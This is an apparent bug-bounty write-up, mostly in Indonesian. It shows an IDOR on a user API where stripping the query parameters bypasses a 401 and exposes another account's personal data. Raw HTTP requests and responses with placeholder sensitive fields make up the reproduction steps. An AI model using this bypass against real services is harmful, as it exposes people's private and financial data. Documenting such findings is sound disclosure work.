IDOR bypassed 401 leading to a leak of personal data


๐ Deskripsi Singkat
Saya menemukan kerentanan Insecure Direct Object Reference (IDOR) di endpoint GET /api/user/[id]
. Sistem awalnya menampilkan 401 Unauthorized saat mengakses data pengguna lain dengan parameter tertentu. Namun, saat parameter dihapus dari URL, endpoint tersebut justru memberikan respon sukses dan menampilkan data pribadi pengguna lain, tanpa otorisasi yang benar.
๐ Langkah Reproduksi
Login sebagai ATTACKER (User A).
Saya menemukan request seperti berikut ketika menelusuri bagian profile
GET /api/user/12345?token=abc123xyz&include=profile,contacts,settings HTTP/1.1 Host:
target-website.com
Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.9 Connection: keep-alive Referer:
https://target-website.com/dashboard
Request ini menampilkan data data pribadi akun milik ATTACKER
HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store
{ "user_id": "1234567890", "username": "johndoe", "email": "
johndoe@example.com
", "password_hash": "$2b$12$EixZaYVK1fsbw1ZfbX3OXe.PxoEwFv0uQ1m07QzH2dq0WyP5fpGuK", "credit_card": { "number": "4111111111111111", "expiry": "12/25", "cvv": "123" }, "social_security_number": "123-45-6789", " bank_account": { "account_number": "9876543210", "routing_number": "021000021" }, "jwt_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...", "two_factor_secret": "JBSWY3DPEHPK3PXP" }
Disini saya mencoba mengganti ID ATTACKER 12345 ke ID akun VICTIM 12346 untuk melihat data data pribadi milik akun victim dan ternyata itu tidak bisa saya mendapatkan โ Respon:
401 Unauthorized
.HTTP/1.1 401 Unauthorized
Content-Type: application/json
WWW-Authenticate: Bearer realm="example", error="invalid_token", error_description="The access token is missing or invalid."
{ "error": "unauthorized", "message": "Authentication required or invalid credentials." }
Setelah itu saya mencoba menghapus semua parameter yang ada pada request line seperti
GET /api/user/12346 HTTP/1.1
Host:
target-website.com
Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.9 Connection: keep-alive
Referer:
https://target-website.com/dashboard
Dan ternyata ini berhasil melewati 401!! saya dapat melihat data data pribadi akun VICTIM muncul di respon
{
"user_id": "1234567890",
"username": "albert",
"email": "
ablert@example.com
",
"password_hash": "$$2b$12$X5jVq3nySlDFG8WqQIwYQesJ2Rb6x9twQ4Q49gJLbYqRpItGmfP5C",
"credit_card": { "number": "5111111111111113", "expiry": "10/28", "cvv": "124" },
"social_security_number": "125-46-6889",
"bank_account": { "account_number": "9276443211", "routing_number": "023000022" },
"jwt_token": "eyJfhwefJHWHFWHjwgfhwjGEEJJRTRJWrjg...",
"two_factor_secret": "JBSEIHWHFWEIOJWRTG"
}
*Jeder Duplicate
Subscribe to my newsletter
Read articles from NXR directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
